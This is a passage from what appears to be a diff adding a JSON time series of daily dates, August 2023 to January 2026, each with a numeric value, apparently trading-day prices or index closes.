"2023-08-29", + 368.7432556152344 + ], + [ + "2023-08-30", + 370.7997131347656 + ], + [ + "2023-08-31", + 371.91156005859375 + ], + [ + "2023-09-01", + 371.5179443359375 + ], + [ + "2023-09-05", + 371.990234375 + ], + [ + "2023-09-06", + 368.71380615234375 + ], + [ + "2023-09-07", + 366.0768737792969 + ], + [ + "2023-09-08", + 366.5885009765625 + ], + [ + "2023-09-11", + 370.9078674316406 + ], + [ + "2023-09-12", + 366.7951354980469 + ], + [ + "2023-09-13", + 368.1922302246094 + ], + [ + "2023-09-14", + 371.2030944824219 + ], + [ + "2023-09-15", + 364.84698486328125 + ], + [ + "2023-09-18", + 365.227294921875 + ], + [ + "2023-09-19", + 364.44891357421875 + ], + [ + "2023-09-20", + 359.197021484375 + ], + [ + "2023-09-21", + 352.6148986816406 + ], + [ + "2023-09-22", + 352.66424560546875 + ], + [ + "2023-09-25", + 354.3392639160156 + ], + [ + "2023-09-26", + 349.0184326171875 + ], + [ + "2023-09-27", + 349.8362121582031 + ], + [ + "2023-09-28", + 352.76275634765625 + ], + [ + "2023-09-29", + 353.0189208984375 + ], + [ + "2023-10-02", + 355.9651184082031 + ], + [ + "2023-10-03", + 349.71807861328125 + ], + [ + "2023-10-04", + 354.47723388671875 + ], + [ + "2023-10-05", + 353.4327697753906 + ], + [ + "2023-10-06", + 359.3547058105469 + ], + [ + "2023-10-09", + 361.1874084472656 + ], + [ + "2023-10-10", + 363.1876220703125 + ], + [ + "2023-10-11", + 365.77911376953125 + ], + [ + "2023-10-12", + 364.50799560546875 + ], + [ + "2023-10-13", + 359.9261474609375 + ], + [ + "2023-10-16", + 363.9956359863281 + ], + [ + "2023-10-17", + 362.80340576171875 + ], + [ + "2023-10-18", + 358.0442199707031 + ], + [ + "2023-10-19", + 354.6940002441406 + ], + [ + "2023-10-20", + 349.4027404785156 + ], + [ + "2023-10-23", + 350.45703125 + ], + [ + "2023-10-24", + 353.8663330078125 + ], + [ + "2023-10-25", + 345.2051696777344 + ], + [ + "2023-10-26", + 338.623046875 + ], + [ + "2023-10-27", + 340.24896240234375 + ], + [ + "2023-10-30", + 344.08184814453125 + ], + [ + "2023-10-31", + 345.72735595703125 + ], + [ + "2023-11-01", + 351.7281188964844 + ], + [ + "2023-11-02", + 358.1131286621094 + ], + [ + "2023-11-03", + 362.320556640625 + ], + [ + "2023-11-06", + 363.798583984375 + ], + [ + "2023-11-07", + 367.2374572753906 + ], + [ + "2023-11-08", + 367.47393798828125 + ], + [ + "2023-11-09", + 364.6460266113281 + ], + [ + "2023-11-10", + 372.84405517578125 + ], + [ + "2023-11-13", + 371.6813049316406 + ], + [ + "2023-11-14", + 379.6823425292969 + ], + [ + "2023-11-15", + 379.9681091308594 + ], + [ + "2023-11-16", + 380.2932434082031 + ], + [ + "2023-11-17", + 380.38189697265625 + ], + [ + "2023-11-20", + 385.01300048828125 + ], + [ + "2023-11-21", + 382.77630615234375 + ], + [ + "2023-11-22", + 384.343017578125 + ], + [ + "2023-11-24", + 383.801025390625 + ], + [ + "2023-11-27", + 383.4660339355469 + ], + [ + "2023-11-28", + 384.4710998535156 + ], + [ + "2023-11-29", + 384.09661865234375 + ], + [ + "2023-11-30", + 383.1310119628906 + ], + [ + "2023-12-01", + 384.2247619628906 + ], + [ + "2023-12-04", + 380.6578369140625 + ], + [ + "2023-12-05", + 381.61358642578125 + ], + [ + "2023-12-06", + 379.4063720703125 + ], + [ + "2023-12-07", + 384.70758056640625 + ], + [ + "2023-12-08", + 386.4220886230469 + ], + [ + "2023-12-11", + 389.7229309082031 + ], + [ + "2023-12-12", + 392.8267822265625 + ], + [ + "2023-12-13", + 397.822509765625 + ], + [ + "2023-12-14", + 397.4776611328125 + ], + [ + "2023-12-15", + 399.3990173339844 + ], + [ + "2023-12-18", + 401.91473388671875 + ], + [ + "2023-12-19", + 403.9682922363281 + ], + [ + "2023-12-20", + 397.9654541015625 + ], + [ + "2023-12-21", + 402.5959777832031 + ], + [ + "2023-12-22", + 403.19818115234375 + ], + [ + "2023-12-26", + 405.6664733886719 + ], + [ + "2023-12-27", + 406.4922790527344 + ], + [ + "2023-12-28", + 406.29473876953125 + ], + [ + "2023-12-29", + 404.5363464355469 + ], + [ + "2024-01-02", + 397.6907653808594 + ], + [ + "2024-01-03", + 393.4825744628906 + ], + [ + "2024-01-04", + 391.45758056640625 + ], + [ + "2024-01-05", + 391.92181396484375 + ], + [ + "2024-01-08", + 400.0220642089844 + ], + [ + "2024-01-09", + 400.81231689453125 + ], + [ + "2024-01-10", + 403.5288391113281 + ], + [ + "2024-01-11", + 404.36846923828125 + ], + [ + "2024-01-12", + 404.575927734375 + ], + [ + "2024-01-16", + 404.5363464355469 + ], + [ + "2024-01-17", + 402.2544860839844 + ], + [ + "2024-01-18", + 407.96417236328125 + ], + [ + "2024-01-19", + 416.0545349121094 + ], + [ + "2024-01-22", + 416.5978088378906 + ], + [ + "2024-01-23", + 418.3265686035156 + ], + [ + "2024-01-24", + 420.6479187011719 + ], + [ + "2024-01-25", + 421.1616516113281 + ], + [ + "2024-01-26", + 418.65252685546875 + ], + [ + "2024-01-29", + 422.939697265625 + ], + [ + "2024-01-30", + 420.1243896484375 + ], + [ + "2024-01-31", + 411.8957214355469 + ], + [ + "2024-02-01", + 416.74603271484375 + ], + [ + "2024-02-02", + 423.78924560546875 + ], + [ + "2024-02-05", + 423.2361145019531 + ], + [ + "2024-02-06", + 422.3865051269531 + ], + [ + "2024-02-07", + 426.7329406738281 + ], + [ + "2024-02-08", + 427.5232849121094 + ], + [ + "2024-02-09", + 431.73138427734375 + ], + [ + "2024-02-12", + 430.0422058105469 + ], + [ + "2024-02-13", + 423.3348693847656 + ], + [ + "2024-02-14", + 427.9480285644531 + ], + [ + "2024-02-15", + 429.2223205566406 + ], + [ + "2024-02-16", + 425.3302917480469 + ], + [ + "2024-02-20", + 422.11981201171875 + ], + [ + "2024-02-21", + 420.4305725097656 + ], + [ + "2024-02-22", + 432.7390441894531 + ], + [ + "2024-02-23", + 431.46466064453125 + ], + [ + "2024-02-26", + 431.23748779296875 + ], + [ + "2024-02-27", + 432.2746887207031 + ], + [ + "2024-02-28", + 429.9730529785156 + ], + [ + "2024-02-29", + 433.65771484375 + ], + [ + "2024-03-01", + 440.18719482421875 + ], + [ + "2024-03-04", + 438.6165771484375 + ], + [ + "2024-03-05", + 430.74359130859375 + ], + [ + "2024-03-06", + 433.45025634765625 + ], + [ + "2024-03-07", + 440.0292053222656 + ], + [ + "2024-03-08", + 433.67742919921875 + ], + [ + "2024-03-11", + 432.0672912597656 + ], + [ + "2024-03-12", + 438.2609558105469 + ], + [ + "2024-03-13", + 434.89239501953125 + ], + [ + "2024-03-14", + 433.7959899902344 + ], + [ + "2024-03-15", + 428.6394958496094 + ], + [ + "2024-03-18", + 432.7276306152344 + ], + [ + "2024-03-19", + 433.8057861328125 + ], + [ + "2024-03-20", + 438.9492492675781 + ], + [ + "2024-03-21", + 441.0264587402344 + ], + [ + "2024-03-22", + 441.5309753417969 + ], + [ + "2024-03-25", + 439.92852783203125 + ], + [ + "2024-03-26", + 438.5041198730469 + ], + [ + "2024-03-27", + 439.9976806640625 + ], + [ + "2024-03-28", + 439.1866760253906 + ], + [ + "2024-04-01", + 440.1164855957031 + ], + [ + "2024-04-02", + 436.3181457519531 + ], + [ + "2024-04-03", + 437.29742431640625 + ], + [ + "2024-04-04", + 430.61083984375 + ], + [ + "2024-04-05", + 435.68505859375 + ], + [ + "2024-04-08", + 435.813720703125 + ], + [ + "2024-04-09", + 437.426025390625 + ], + [ + "2024-04-10", + 433.60791015625 + ], + [ + "2024-04-11", + 440.5318908691406 + ], + [ + "2024-04-12", + 433.509033203125 + ], + [ + "2024-04-15", + 426.3773498535156 + ], + [ + "2024-04-16", + 426.4169006347656 + ], + [ + "2024-04-17", + 421.2140197753906 + ], + [ + "2024-04-18", + 418.8103942871094 + ], + [ + "2024-04-19", + 410.1456298828125 + ], + [ + "2024-04-22", + 414.2702941894531 + ], + [ + "2024-04-23", + 420.4524230957031 + ], + [ + "2024-04-24", + 421.8768005371094 + ], + [ + "2024-04-25", + 419.8392028808594 + ], + [ + "2024-04-26", + 426.3179931640625 + ], + [ + "2024-04-29", + 428.0489807128906 + ], + [ + "2024-04-30", + 419.9776306152344 + ], + [ + "2024-05-01", + 416.94097900390625 + ], + [ + "2024-05-02", + 422.26251220703125 + ], + [ + "2024-05-03", + 430.74932861328125 + ], + [ + "2024-05-06", + 435.46746826171875 + ], + [ + "2024-05-07", + 435.5367736816406 + ], + [ + "2024-05-08", + 435.2795715332031 + ], + [ + "2024-05-09", + 436.2291564941406 + ], + [ + "2024-05-10", + 437.2578430175781 + ], + [ + "2024-05-13", + 438.26678466796875 + ], + [ + "2024-05-14", + 441.0857849121094 + ], + [ + "2024-05-15", + 447.9801025390625 + ], + [ + "2024-05-16", + 447.0700988769531 + ], + [ + "2024-05-17", + 446.8524475097656 + ], + [ + "2024-05-20", + 449.9682922363281 + ], + [ + "2024-05-21", + 450.84857177734375 + ], + [ + "2024-05-22", + 450.75958251953125 + ], + [ + "2024-05-23", + 448.7318420410156 + ], + [ + "2024-05-24", + 452.9752197265625 + ], + [ + "2024-05-28", + 454.6864013671875 + ], + [ + "2024-05-29", + 451.48162841796875 + ], + [ + "2024-05-30", + 446.64471435546875 + ], + [ + "2024-05-31", + 445.8138732910156 + ], + [ + "2024-06-03", + 448.2076110839844 + ], + [ + "2024-06-04", + 449.43414306640625 + ], + [ + "2024-06-05", + 458.49462890625 + ], + [ + "2024-06-06", + 458.3363952636719 + ], + [ + "2024-06-07", + 457.9308166503906 + ], + [ + "2024-06-10", + 459.7804870605469 + ], + [ + "2024-06-11", + 462.9358215332031 + ], + [ + "2024-06-12", + 468.9992370605469 + ], + [ + "2024-06-13", + 471.54132080078125 + ], + [ + "2024-06-14", + 473.9844970703125 + ], + [ + "2024-06-17", + 479.79071044921875 + ], + [ + "2024-06-18", + 479.9391174316406 + ], + [ + "2024-06-20", + 476.23974609375 + ], + [ + "2024-06-21", + 474.9637451171875 + ], + [ + "2024-06-24", + 469.5564270019531 + ], + [ + "2024-06-25", + 474.92608642578125 + ], + [ + "2024-06-26", + 475.90692138671875 + ], + [ + "2024-06-27", + 477.1353759765625 + ], + [ + "2024-06-28", + 474.6585998535156 + ], + [ + "2024-07-01", + 477.4425354003906 + ], + [ + "2024-07-02", + 482.45550537109375 + ], + [ + "2024-07-03", + 486.477783203125 + ], + [ + "2024-07-05", + 491.55023193359375 + ], + [ + "2024-07-08", + 492.7192077636719 + ], + [ + "2024-07-09", + 493.1452331542969 + ], + [ + "2024-07-10", + 498.2869873046875 + ], + [ + "2024-07-11", + 487.3595275878906 + ], + [ + "2024-07-12", + 490.22265625 + ], + [ + "2024-07-15", + 491.5402526855469 + ], + [ + "2024-07-16", + 491.7284851074219 + ], + [ + "2024-07-17", + 477.29388427734375 + ], + [ + "2024-07-18", + 475.0350341796875 + ], + [ + "2024-07-19", + 470.8245544433594 + ], + [ + "2024-07-22", + 477.8388366699219 + ], + [ + "2024-07-23", + 476.1545715332031 + ], + [ + "2024-07-24", + 459.0747375488281 + ], + [ + "2024-07-25", + 454.0121765136719 + ], + [ + "2024-07-26", + 458.6686096191406 + ], + [ + "2024-07-29", + 459.58990478515625 + ], + [ + "2024-07-30", + 453.27911376953125 + ], + [ + "2024-07-31", + 466.69329833984375 + ], + [ + "2024-08-01", + 455.38934326171875 + ], + [ + "2024-08-02", + 444.5806884765625 + ], + [ + "2024-08-05", + 431.32501220703125 + ], + [ + "2024-08-06", + 435.4463195800781 + ], + [ + "2024-08-07", + 430.7305603027344 + ], + [ + "2024-08-08", + 443.906982421875 + ], + [ + "2024-08-09", + 446.22528076171875 + ], + [ + "2024-08-12", + 447.1862487792969 + ], + [ + "2024-08-13", + 458.28216552734375 + ], + [ + "2024-08-14", + 458.43084716796875 + ], + [ + "2024-08-15", + 470.0121765136719 + ], + [ + "2024-08-16", + 470.6164855957031 + ], + [ + "2024-08-19", + 476.79852294921875 + ], + [ + "2024-08-20", + 475.79791259765625 + ], + [ + "2024-08-21", + 478.01708984375 + ], + [ + "2024-08-22", + 470.438232421875 + ], + [ + "2024-08-23", + 475.5403747558594 + ], + [ + "2024-08-26", + 470.92364501953125 + ], + [ + "2024-08-27", + 472.3304748535156 + ], + [ + "2024-08-28", + 466.970703125 + ], + [ + "2024-08-29", + 466.2871398925781 + ], + [ + "2024-08-30", + 471.8450012207031 + ], + [ + "2024-09-03", + 457.5193786621094 + ], + [ + "2024-09-04", + 456.3304748535156 + ], + [ + "2024-09-05", + 456.75653076171875 + ], + [ + "2024-09-06", + 444.521240234375 + ], + [ + "2024-09-09", + 450.23760986328125 + ], + [ + "2024-09-10", + 454.3985900878906 + ], + [ + "2024-09-11", + 464.26605224609375 + ], + [ + "2024-09-12", + 468.8233947753906 + ], + [ + "2024-09-13", + 470.92364501953125 + ], + [ + "2024-09-16", + 468.8431701660156 + ], + [ + "2024-09-17", + 469.0908508300781 + ], + [ + "2024-09-18", + 467.05987548828125 + ], + [ + "2024-09-19", + 478.86907958984375 + ], + [ + "2024-09-20", + 477.9576416015625 + ], + [ + "2024-09-23", + 479.224609375 + ], + [ + "2024-09-24", + 481.53619384765625 + ], + [ + "2024-09-25", + 481.9826354980469 + ], + [ + "2024-09-26", + 485.6037902832031 + ], + [ + "2024-09-27", + 482.9053039550781 + ], + [ + "2024-09-30", + 484.21484375 + ], + [ + "2024-10-01", + 477.4685363769531 + ], + [ + "2024-10-02", + 478.1432189941406 + ], + [ + "2024-10-03", + 477.7860412597656 + ], + [ + "2024-10-04", + 483.47076416015625 + ], + [ + "2024-10-07", + 478.2920227050781 + ], + [ + "2024-10-08", + 485.43511962890625 + ], + [ + "2024-10-09", + 489.2547302246094 + ], + [ + "2024-10-10", + 488.6991882324219 + ], + [ + "2024-10-11", + 489.4630432128906 + ], + [ + "2024-10-14", + 493.57037353515625 + ], + [ + "2024-10-15", + 486.972900390625 + ], + [ + "2024-10-16", + 487.0324401855469 + ], + [ + "2024-10-17", + 487.3697509765625 + ], + [ + "2024-10-18", + 490.5643005371094 + ], + [ + "2024-10-21", + 491.5068054199219 + ], + [ + "2024-10-22", + 492.0425109863281 + ], + [ + "2024-10-23", + 484.5025329589844 + ], + [ + "2024-10-24", + 488.4313049316406 + ], + [ + "2024-10-25", + 491.4075622558594 + ], + [ + "2024-10-28", + 491.4869689941406 + ], + [ + "2024-10-29", + 496.2093505859375 + ], + [ + "2024-10-30", + 492.4592590332031 + ], + [ + "2024-10-31", + 480.0281982421875 + ], + [ + "2024-11-01", + 483.57989501953125 + ], + [ + "2024-11-04", + 482.171142578125 + ], + [ + "2024-11-05", + 488.3221435546875 + ], + [ + "2024-11-06", + 501.5865478515625 + ], + [ + "2024-11-07", + 509.48358154296875 + ], + [ + "2024-11-08", + 510.07891845703125 + ], + [ + "2024-11-11", + 509.78131103515625 + ], + [ + "2024-11-12", + 508.8586120605469 + ], + [ + "2024-11-13", + 508.203857421875 + ], + [ + "2024-11-14", + 504.6719970703125 + ], + [ + "2024-11-15", + 492.6477355957031 + ], + [ + "2024-11-18", + 496.0704650878906 + ], + [ + "2024-11-19", + 499.4833068847656 + ], + [ + "2024-11-20", + 499.1955871582031 + ], + [ + "2024-11-21", + 500.99127197265625 + ], + [ + "2024-11-22", + 501.7948913574219 + ], + [ + "2024-11-25", + 502.5885314941406 + ], + [ + "2024-11-26", + 505.28704833984375 + ], + [ + "2024-11-27", + 501.3087463378906 + ], + [ + "2024-11-29", + 505.7136535644531 + ], + [ + "2024-12-02", + 511.21978759765625 + ], + [ + "2024-12-03", + 512.787353515625 + ], + [ + "2024-12-04", + 519.126953125 + ], + [ + "2024-12-05", + 517.6883544921875 + ], + [ + "2024-12-06", + 522.3214111328125 + ], + [ + "2024-12-09", + 518.2537841796875 + ], + [ + "2024-12-10", + 516.4879150390625 + ], + [ + "2024-12-11", + 525.7342529296875 + ], + [ + "2024-12-12", + 522.3413696289062 + ], + [ + "2024-12-13", + 526.3395385742188 + ], + [ + "2024-12-16", + 533.9191284179688 + ], + [ + "2024-12-17", + 531.5678100585938 + ], + [ + "2024-12-18", + 512.3905029296875 + ], + [ + "2024-12-19", + 510.10870361328125 + ], + [ + "2024-12-20", + 514.5631713867188 + ], + [ + "2024-12-23", + 519.5764770507812 + ], + [ + "2024-12-24", + 526.621826171875 + ], + [ + "2024-12-26", + 526.2639770507812 + ], + [ + "2024-12-27", + 519.2683715820312 + ], + [ + "2024-12-30", + 512.3621215820312 + ], + [ + "2024-12-31", + 508.0097961425781 + ], + [ + "2025-01-02", + 507.01611328125 + ], + [ + "2025-01-03", + 515.3135375976562 + ], + [ + "2025-01-06", + 521.2359008789062 + ], + [ + "2025-01-07", + 511.9348449707031 + ], + [ + "2025-01-08", + 512.0242919921875 + ], + [ + "2025-01-10", + 503.9952392578125 + ], + [ + "2025-01-13", + 502.37548828125 + ], + [ + "2025-01-14", + 501.89849853515625 + ], + [ + "2025-01-15", + 513.4453735351562 + ], + [ + "2025-01-16", + 509.84814453125 + ], + [ + "2025-01-17", + 518.4535522460938 + ], + [ + "2025-01-21", + 521.4943237304688 + ], + [ + "2025-01-22", + 528.1620483398438 + ], + [ + "2025-01-23", + 529.284912109375 + ], + [ + "2025-01-24", + 526.2938842773438 + ], + [ + "2025-01-27", + 510.9710693359375 + ], + [ + "2025-01-28", + 518.5231323242188 + ], + [ + "2025-01-29", + 517.54931640625 + ], + [ + "2025-01-30", + 519.7552490234375 + ], + [ + "2025-01-31", + 519.0000610351562 + ], + [ + "2025-02-03", + 514.8463745117188 + ], + [ + "2025-02-04", + 521.1663818359375 + ], + [ + "2025-02-05", + 523.5313720703125 + ], + [ + "2025-02-06", + 526.2639770507812 + ], + [ + "2025-02-07", + 519.6260986328125 + ], + [ + "2025-02-10", + 525.9161987304688 + ], + [ + "2025-02-11", + 524.6641845703125 + ], + [ + "2025-02-12", + 524.9722900390625 + ], + [ + "2025-02-13", + 532.5243530273438 + ], + [ + "2025-02-14", + 534.7601928710938 + ], + [ + "2025-02-18", + 535.9724731445312 + ], + [ + "2025-02-19", + 536.1216430664062 + ], + [ + "2025-02-20", + 533.845947265625 + ], + [ + "2025-02-21", + 522.766357421875 + ], + [ + "2025-02-24", + 516.5952758789062 + ], + [ + "2025-02-25", + 510.0865783691406 + ], + [ + "2025-02-26", + 511.3187561035156 + ], + [ + "2025-02-27", + 497.1188049316406 + ], + [ + "2025-02-28", + 504.9691162109375 + ], + [ + "2025-03-03", + 493.9190673828125 + ], + [ + "2025-03-04", + 492.42852783203125 + ], + [ + "2025-03-05", + 498.84783935546875 + ], + [ + "2025-03-06", + 485.1248779296875 + ], + [ + "2025-03-07", + 488.6922302246094 + ], + [ + "2025-03-10", + 469.7522888183594 + ], + [ + "2025-03-11", + 468.6294250488281 + ], + [ + "2025-03-12", + 473.9159240722656 + ], + [ + "2025-03-13", + 465.3899230957031 + ], + [ + "2025-03-14", + 476.6386413574219 + ], + [ + "2025-03-17", + 479.72900390625 + ], + [ + "2025-03-18", + 471.5509033203125 + ], + [ + "2025-03-19", + 477.86090087890625 + ], + [ + "2025-03-20", + 476.2411804199219 + ], + [ + "2025-03-21", + 477.8111877441406 + ], + [ + "2025-03-24", + 488.2964172363281 + ], + [ + "2025-03-25", + 491.08294677734375 + ], + [ + "2025-03-26", + 482.0466613769531 + ], + [ + "2025-03-27", + 479.29998779296875 + ], + [ + "2025-03-28", + 466.6810607910156 + ], + [ + "2025-03-31", + 466.66119384765625 + ], + [ + "2025-04-01", + 470.4229736328125 + ], + [ + "2025-04-02", + 473.8563232421875 + ], + [ + "2025-04-03", + 448.4891357421875 + ], + [ + "2025-04-04", + 420.63397216796875 + ], + [ + "2025-04-07", + 421.6490478515625 + ], + [ + "2025-04-08", + 414.0557861328125 + ], + [ + "2025-04-09", + 463.7552490234375 + ], + [ + "2025-04-10", + 444.0306701660156 + ], + [ + "2025-04-11", + 452.2110900878906 + ], + [ + "2025-04-14", + 455.2762451171875 + ], + [ + "2025-04-15", + 455.7837829589844 + ], + [ + "2025-04-16", + 442.04034423828125 + ], + [ + "2025-04-17", + 441.9607238769531 + ], + [ + "2025-04-21", + 431.0236511230469 + ], + [ + "2025-04-22", + 442.3388977050781 + ], + [ + "2025-04-23", + 452.37030029296875 + ], + [ + "2025-04-24", + 465.0987243652344 + ], + [ + "2025-04-25", + 470.2835998535156 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.23931884765625 + ], + [ + "2025-04-30", + 473.17962646484375 + ], + [ + "2025-05-01", + 479.35968017578125 + ], + [ + "2025-05-02", + 486.4752502441406 + ], + [ + "2025-05-05", + 483.5892028808594 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.97186279296875 + ], + [ + "2025-05-08", + 485.9378967285156 + ], + [ + "2025-05-09", + 485.619384765625 + ], + [ + "2025-05-12", + 505.4036560058594 + ], + [ + "2025-05-13", + 513.1064453125 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7486572265625 + ], + [ + "2025-05-16", + 518.9978637695312 + ], + [ + "2025-05-19", + 519.4954223632812 + ], + [ + "2025-05-20", + 517.7637939453125 + ], + [ + "2025-05-21", + 510.5685729980469 + ], + [ + "2025-05-22", + 511.5240173339844 + ], + [ + "2025-05-23", + 506.7868957519531 + ], + [ + "2025-05-27", + 518.709228515625 + ], + [ + "2025-05-28", + 516.4102783203125 + ], + [ + "2025-05-29", + 517.4254150390625 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.6896362304688 + ], + [ + "2025-06-03", + 524.7599487304688 + ], + [ + "2025-06-04", + 526.2228393554688 + ], + [ + "2025-06-05", + 522.261962890625 + ], + [ + "2025-06-06", + 527.3673095703125 + ], + [ + "2025-06-09", + 528.1436157226562 + ], + [ + "2025-06-10", + 531.6365966796875 + ], + [ + "2025-06-11", + 529.84521484375 + ], + [ + "2025-06-12", + 531.0892944335938 + ], + [ + "2025-06-13", + 524.421630859375 + ], + [ + "2025-06-16", + 531.71630859375 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417724609375 + ], + [ + "2025-06-20", + 524.292236328125 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.7831420898438 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.1992797851562 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622314453125 + ], + [ + "2025-07-07", + 549.9878540039062 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.1921997070312 + ], + [ + "2025-07-10", + 553.3951416015625 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.1524047851562 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.228271484375 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7242431640625 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747192382812 + ], + [ + "2025-07-28", + 566.0382080078125 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309936523438 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2212524414062 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.7307739257812 + ], + [ + "2025-08-12", + 577.904052734375 + ], + [ + "2025-08-13", + 578.1930541992188 + ], + [ + "2025-08-14", + 577.7448120117188 + ], + [ + "2025-08-15", + 575.2041625976562 + ], + [ + "2025-08-18", + 574.9749755859375 + ], + [ + "2025-08-19", + 567.1739501953125 + ], + [ + "2025-08-20", + 563.8065185546875 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.2101440429688 + ], + [ + "2025-08-26", + 570.4916381835938 + ], + [ + "2025-08-27", + 571.3684692382812 + ], + [ + "2025-08-28", + 574.9451904296875 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.527587890625 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019897460938 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624877929688 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.919189453125 + ], + [ + "2025-09-12", + 584.4896240234375 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.9929809570312 + ], + [ + "2025-09-17", + 587.8173217773438 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1326904296875 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.88427734375 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4783935546875 + ], + [ + "2025-10-15", + 600.6876220703125 + ], + [ + "2025-10-16", + 598.4633178710938 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.98388671875 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4693603515625 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.6743774414062 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.792724609375 + ], + [ + "2025-11-19", + 598.3436889648438 + ], + [ + "2025-11-20", + 584.1798095703125 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3406982421875 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.6743774414062 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4173583984375 + ], + [ + "2025-12-03", + 621.9335327148438 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915893554688 + ], + [ + "2025-12-09", + 623.4595947265625 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0587158203125 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601806640625 + ], + [ + "2025-12-19", + 615.4799194335938 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 